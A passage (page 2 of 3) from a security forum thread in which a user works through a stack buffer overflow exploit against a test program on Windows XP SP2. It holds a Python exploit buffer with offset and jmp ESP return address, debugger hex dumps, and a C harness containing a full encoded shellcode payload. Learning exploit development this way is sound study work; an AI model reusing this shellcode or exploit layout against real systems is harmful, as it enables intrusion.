Page 2 of 3 FirstFirst 123 LastLast
Results 11 to 20 of 22

Thread: help in writing exploits stack overflow on xp sp2

  1. #11
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    Also a Jump ECX will not work with Windows XP.
    I didn't know what the OP might mean by that just tested my way and ran, but what is jump ECX and whats the differents from linux and window(just area i can google)

    If you can Please try it on some xp sp2 machine and tell me where I m going wrong.
    From xp sp3 to sp2 the only think that should change is from 00400000 to another 00400000 if you used the code I posted. I would like to find out about this jmp ecx as i'm not to fimaly about that and proable won't beable to help you in that regard.

    The first NOP's I mean the beginnng of the shellcodes are being pointed by ECX
    I'm new to this compared to the old fellow here, but is it eip or ebp?

    which machine u tried as I find after 524 bytes is eip is overwritten.
    minus by 4 untill the eip doesn't have \x90 in it, and then add a pionter/jmp to the nops at the start of the shellcode(if using ollydbg look at the bottom left)
    0022E020
    those address(#7 post) look like the heap not stack, look higher

  2. #12
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    9

    Default

    can u please tell me why jmp ECX wont work on XP If not what else should I do

  3. #13
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    I've got a working exploit for your source.

    It is quite simple.

    You went into the right direction also with your layout of the memory. But you should give your buffer a closer look. Check the registers again. Maybe you shouldn't jump to ECX but some other register.
    Tiocfaidh ár lá

  4. #14
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    9

    Default

    yes ESP is pointing to the the buffer.eip overwritten at 524 and esp points at 528th byte.I use the following code to test.I find the total available space for shelocode is 932 bytes (after esp).But after running the following code I find EIP overwritten by a stack address 0022EC3D .I have pasted the part of hex dump.I have even tested with few othe jmp esp address but still not getting result

    buffer = "A" * 524 #junk data
    buffer += '\x5D\x38\x82\x7C' #jmp ESP address eip
    buffer += "B" * 4 #esp nops
    buffer += "C" * 928 #shellcode +nop
    buffer += '\r\n'
    print buffer

    hex dump
    ------------------------------------------
    0022EC1D 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC25 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC2D 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC35 41 41 41 41 41 41 41 5D AAAAAAA]
    0022EC3D 38 82 7C 42 42 42 42 43 8‚|BBBBC ----address pointed by eip
    0022EC45 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC4D 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC55 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC5D 43 43 43 43 43 43 43 43 CCCCCCCC

    I think eip should contain adress of jmp esp.I have tried to use with shellcode also but not getting dsired results.Am I going wrong somewhere.Can u please suggest me how I should proceed further.

  5. #15
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    But after running the following code I find EIP overwritten by a stack address 0022EC3D
    buffer = "A" * 524 #junk data
    buffer += '\x5D\x38\x82\x7C' #jmp ESP address eip
    buffer += "B" * 4 #esp nops
    buffer += "C" * 928 #shellcode +nop
    buffer += '\r\n'
    print buffer

    hex dump
    ------------------------------------------
    0022EC1D 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC25 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC2D 41 41 41 41 41 41 41 41 AAAAAAAA
    0022EC35 41 41 41 41 41 41 41 5D AAAAAAA]
    0022EC3D 38 82 7C 42 42 42 42 43 8‚|BBBBC ----address pointed by eip
    0022EC45 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC4D 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC55 43 43 43 43 43 43 43 43 CCCCCCCC
    0022EC5D 43 43 43 43 43 43 43 43 CCCCCCCC
    buffer = "A" * 524 #junk data
    buffer += '\x5D\x38\x82\x7C' #jmp ESP address eip
    buffer += "\x45\xec\x22\x00"
    buffer += "C" * 928 #shellcode +nop
    buffer += '\r\n'

  6. #16
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Try to use a different JMP ESP
    Tiocfaidh ár lá

  7. #17
    Very good friend of the forum Virchanza's Avatar
    Join Date
    Jan 2010
    Posts
    863

    Default

    Regarding "zero bytes":

    In the C programming language, and in many other programming languages, a string is a sequence of characters followed by a terminating null character. So for instance, if you had the string, "dog", it would be the following four bytes:

    1: The ASCII code for d
    2: The ASCII code for o
    3: The ASCII code for g
    4: The terminating null character (which is simply all bits zero)

    If you were to copy this string, for instance by using the "strcpy" function, then "strcpy" will stop copying when it encounters the terminating null character. This is where the problem lies. If your shell code contains a zero byte, then all string functions will stop reading at the zero byte. So if your shell code contains a zero byte, you need to improvise somehow to get rid of it (that's of course assuming that your shell code will be processed by a string-processing routine).
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

  8. #18
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    9

    Default

    I have tsted the shellcode using the following.It works as it should.I dont think a null byte is thr.

    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>

    char shellcode[]=
    "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x85"
    "\x3f\x2a\xbd\x83\xeb\xfc\xe2\xf4\x79\x55\xc1\xf0\ x6d\xc6\xd5\x42"
    "\x7a\x5f\xa1\xd1\xa1\x1b\xa1\xf8\xb9\xb4\x56\xb8\ xfd\x3e\xc5\x36"
    "\xca\x27\xa1\xe2\xa5\x3e\xc1\xf4\x0e\x0b\xa1\xbc\ x6b\x0e\xea\x24"
    "\x29\xbb\xea\xc9\x82\xfe\xe0\xb0\x84\xfd\xc1\x49\ xbe\x6b\x0e\x95"
    "\xf0\xda\xa1\xe2\xa1\x3e\xc1\xdb\x0e\x33\x61\x36\ xda\x23\x2b\x56"
    "\x86\x13\xa1\x34\xe9\x1b\x36\xdc\x46\x0e\xf1\xd9\ x0e\x7c\x1a\x36"
    "\xc5\x33\xa1\xcd\x99\x92\xa1\xfd\x8d\x61\x42\x33\ xcb\x31\xc6\xed"
    "\x7a\xe9\x4c\xee\xe3\x57\x19\x8f\xed\x48\x59\x8f\ xda\x6b\xd5\x6d"
    "\xed\xf4\xc7\x41\xbe\x6f\xd5\x6b\xda\xb6\xcf\xdb\ x04\xd2\x22\xbf"
    "\xd0\x55\x28\x42\x55\x57\xf3\xb4\x70\x92\x7d\x42\ x53\x6c\x79\xee"
    "\xd6\x6c\x69\xee\xc6\x6c\xd5\x6d\xe3\x57\x3b\xe1\ xe3\x6c\xa3\x5c"
    "\x10\x57\x8e\xa7\xf5\xf8\x7d\x42\x53\x55\x3a\xec\ xd0\xc0\xfa\xd5"
    "\x21\x92\x04\x54\xd2\xc0\xfc\xee\xd0\xc0\xfa\xd5\ x60\x76\xac\xf4"
    "\xd2\xc0\xfc\xed\xd1\x6b\x7f\x42\x55\xac\x42\x5a\ xfc\xf9\x53\xea"
    "\x7a\xe9\x7f\x42\x55\x59\x40\xd9\xe3\x57\x49\xd0\ x0c\xda\x40\xed"
    "\xdc\x16\xe6\x34\x62\x55\x6e\x34\x67\x0e\xea\x4e\ x2f\xc1\x68\x90"
    "\x7b\x7d\x06\x2e\x08\x45\x12\x16\x2e\x94\x42\xcf\ x7b\x8c\x3c\x42"
    "\xf0\x7b\xd5\x6b\xde\x68\x78\xec\xd4\x6e\x40\xbc\ xd4\x6e\x7f\xec"
    "\x7a\xef\x42\x10\x5c\x3a\xe4\xee\x7a\xe9\x40\x42\ x7a\x08\xd5\x6d"
    "\x0e\x68\xd6\x3e\x41\x5b\xd5\x6b\xd7\xc0\xfa\xd5\ x75\xb5\x2e\xe2"
    "\xd6\xc0\xfc\x42\x55\x3f\x2a\xbd";


    int main ()
    {
    int *ret;
    ret=(int *)&ret+2;
    printf("Shellcode Length is : %d",strlen(shellcode));
    (*ret)=(int)shellcode;
    return 0;
    }

  9. #19
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    As there is no badchar I don't know why it shouldn't work.

    Could you please tell us what the exact problem is atm?
    Tiocfaidh ár lá

  10. #20
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    9

    Default

    Quote Originally Posted by KMDave View Post
    Try to use a different JMP ESP

    Hi I still have the problem with other jmp esp address.I am not able to find whats wrong.I dont think I have done any wrong calculation regarding offsets and other things.Can u pls guide me furthur.

Page 2 of 3 FirstFirst 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •